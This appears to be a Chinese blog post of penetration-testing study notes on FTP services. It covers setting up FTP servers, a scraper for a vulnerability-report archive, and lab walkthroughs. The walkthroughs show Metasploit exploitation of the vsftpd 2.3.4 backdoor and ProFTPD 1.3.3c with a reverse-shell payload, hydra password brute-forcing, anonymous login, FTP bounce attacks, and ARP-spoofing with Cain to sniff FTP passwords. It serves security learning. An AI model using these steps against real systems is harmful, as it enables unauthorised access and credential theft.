端口与服务-ftp服务

1概述

1.1.从先知和乌云上爬取端口历史漏洞报告,总结报告

1.2.全面总结,出具一个表格之类的汇总表

2.ftp

# -*- coding: utf-8 -*-
import requests,re,sys
def wooyun_chax(keywords,page):
    url =
"https://wooyun.x10sec.org/search?keywords="+keywords+"&&content_search_by=by_bugs&&search_by_html=False&&page="+page
    print(url)
    req = requests.get(url)
    text = req.text
    r = re.findall('<td><a
href="(.*?)" target="_blank">\s(.*?)</a>',text)
    for i in r:
        print("漏洞名称:"+i[1])
        print("漏洞链接:"+"https://wooyun.x10sec.org/"+i[0])
        print("漏洞总结:")
wooyun_chax(sys.argv[1],sys.argv[2])
2.1 ftp搭建

iis搭建

1.安装ftp服务:控制面板-程序和功能-打开或关闭windows功能-internet信息服务-ftp服务
2.查询ftp服务:计算机-管理-iis
3.创建一个ftp站点:右键-添加ftp站点-填写站点名称/目录-端口和IP-权限设置
4.启动

FileZillaServer搭建

1.安装:FileZillaServer-百度搜索下载-安装,打开
2.设置:打开-设置端口-edit-users-shared folders设置目录-添加用户-general设置密码
3.查看日志:edit-settings

2.2典型案列

1.后门vsftpd  https://www.freebuf.com/column/143480.html

总结

1.搜索:钟馗之眼搜索 product:vsftpd 2.3.4
   2.nmap漏洞探测:nmap --script=vuln且提示anonymous可以匿名登录
   3.msf攻击
            1.use exploit/unix/ftp/vsftpd_234_backdoor
            2.set rhost和rport
       3.exploit攻击
            4.创建用户,提权

2.ftp远程代码溢出  https://blog.csdn.net/weixin_42214273/article/details/82892282

总结

  1.环境:靶机 192.168.88.165 攻击机 192.168.88.138
  2.扫描:nmap -sV 192.168.88.165 扫描服务和版本
  nmap -A -v 192.168.88.165 扫描全部信息 不好用
  nmap -O 192.168.88.165 探测靶场的操作系统类型与版本
  3.发现开启的服务:ftp proftpd 1.3.3c
  4.在kali中搜索漏洞:searchsploit ProFTPD 1.3.3c 未找到
  5.msf中搜索相应漏洞模块:search ProFTPD 1.3.3c
    配置1.设置payload set payload cmd/unix/reverse
    2.设置lhost和rhost
    3.exploit攻击
    4.id查看
    5.端口优化:python –c “import pty;pty.spawn(‘/bin/bash’)”
    6.获取flag:一般flag放在root下 cd /root

3.ftp跳转攻击。 https://blog.csdn.net/mgxcool/article/details/48249473

2.3 攻击方式

ftp://192.168.43.85 1.正常输入uname和paw登陆,显示乱码。解决:控制面板-区域和语言-当前系统区域设置-设置为中文(简体,中国)

2.匿名访问 用户名:anonymous 密码:为空或者任意邮箱

3.直接访问

4.暴力猜解 hydra 192.168.43.85 ftp -L username.txt -P pwd.txt -o 111.txt

5.后门vsftpd

6.ftp远程代码溢出

7.跳转攻击

8.嗅探  cain嗅探ftp密码

2.4 cain嗅探ftp密码

1.设置 网卡设置cain-configure-sniffer-选择用于嗅探的网卡
arp中可以设置伪造的ip和mac地址
端口设置filters and ports-设置嗅探的端口
2.操作 找到被欺骗的IP:点击sniffer-scan mac address-打开arp页面-选择被欺骗的IP
点击嗅探
结果:passwords处显示抓取的密码

端口与服务-ftp服务的更多相关文章

  1. FTP服务安装与端口说明

    FTP服务安装与端口说明 FTP端口修改安装部署windowswindows 2012文件服务 1. FTP服务介绍 1.1 什么是FTP FTP(File Transfer Protocol)是文件 ...

  2. 修改ftp服务的监听端口

    需求说明: 今天在做一个项目的时候,低端的端口都给屏蔽掉了,需要进行修改为高端端口才能访问,在此记录下. 操作过程: 1.修改ftp的配置文件vsftpd.conf,增加以下的配置 listen_po ...

  3. ftp服务配置文件记录

    因为南京的客户死活要ftp服务而不是sftp,所以我作手用vsftp作为服务器,尝试在windows ftp软件登录进去,特记录vsftp的用法. 配置文件在/etc/vsftpd.conf 有如下代 ...

  4. CentOS7 FTP服务搭建(虚拟用户访问FTP服务)

    概述 最近在搞Oracle在Linux系统下集群,针对Linux系统,笔人也是一片空白.Liunx外部文件的传输,避免不了使用FTP服务,所以现在就整理下,CentOS7环境下,FTP服务的搭建.FT ...

  5. 5. 网络配置与FTP服务笔记

    IP地址: Ipv4        2*32       Ipv6 tcp      网络通讯协议 udp    用户数据报协议 常见网络端口: 20  21      ftp服务 文件共享 22   ...

  6. Linux安装FTP服务

    转自:http://blog.csdn.net/huangbiao86/article/details/6641952 ftp服务器 1.  在Linux和其他机器之间共享文件(在linux下安装ft ...

  7. Linux SSH,FTP服务配置

    CentOS-6.4-x86_64-minimal 0.网卡配置 参考:Linux系统\Centos没有网卡eth0配置文件怎么办? - http://jingyan.baidu.com/articl ...

  8. CentOS系统下安装配置ftp服务

    安装配置步骤: rpm -ivh /opt/bak/vsftpd-2.2.2-11.el6.x86_64.rpm --本地安装vsftpd ll /etc/vsftpd/  --查看vsftpd的配置 ...

  9. Ubuntu学习总结-02 Ubuntu下的FTP服务的安装和设置

    一 安装vsftpd 在安装前vsftpd,先更新apt-get下载的数据源输入如下命令: sudo apt-get update 然后安装vsftpd sudo apt-get install vs ...

随机推荐

  1. 最新 龙采科技java校招面经 (含整理过的面试题大全)

    从6月到10月,经过4个月努力和坚持,自己有幸拿到了网易雷火.京东.去哪儿.龙采科技等10家互联网公司的校招Offer,因为某些自身原因最终选择了龙采科技.6.7月主要是做系统复习.项目复盘.Leet ...

  2. [转帖]IIS7配置Gzip压缩

    IIS7配置Gzip压缩 https://www.cnblogs.com/coce/p/6804373.html   II7中自带了gzip功能,理论上应该比ii6配置起来应该简单一点,但是容易出的问 ...

  3. 关于HTTP返回码

    301与302区别: 301 重定向 三种主流搜索引擎(Google, Bing, Yahoo)对待301都是一样的.它们忽略原始链接然后把重定向后的新链接加入索引.例如:如果用301把 http:/ ...

  4. 2019年9月(System.Data.OracleClient 需要 Oracle 客户端软件 version 8.1.7 或更高版本。)问题解决记录

    System.Data.OracleClient 需要 Oracle 客户端软件 version 8.1.7 或更高版本. 在百度上寻找了很久,都说是权限的问题,可是更改过后一点效果也没有. 实际上真 ...

  5. servlet获取checkbox的值出现选中的值为on。问题所在。。。

    <form action="/Http/request06" method="post"> 用户名:<input type="tex ...

  6. php静态调用非静态方法

    <?php /** * php静态调用非静态方法 * author: 百里 * Date: 2019/7/18 * Time: 17:28 */ function dump(...$var) { ...

  7. 剑指offer24:二叉树中和为输入整数值的所有路径。(注意: 在返回值的list中,数组长度大的数组靠前)

    1 题目描述 输入一颗二叉树的根节点和一个整数,打印出二叉树中结点值的和为输入整数的所有路径.路径定义为从树的根结点开始往下一直到叶结点所经过的结点形成一条路径.(注意: 在返回值的list中,数组长 ...

  8. codeforces 1244C (思维 or 扩展欧几里得)

    (点击此处查看原题) 题意分析 已知 n , p , w, d ,求x , y, z的值 ,他们的关系为: x + y + z = n x * w + y * d = p 思维法 当 y < w ...

  9. python 修改文件的创建时间、修改时间、访问时间

    目录 python 修改文件创建.修改.访问时间 方案一 方案二(无法修改文件创建时间) python 修改文件创建.修改.访问时间 突如其来想知道一下 python 如何修改文件的属性(创建.修改. ...

  10. 【数据结构】P1054 等价表达式

    [题目链接] https://www.luogu.org/problem/P1054 题目描述 明明进了中学之后,学到了代数表达式.有一天,他碰到一个很麻烦的选择题.这个题目的题干中首先给出了一个代数 ...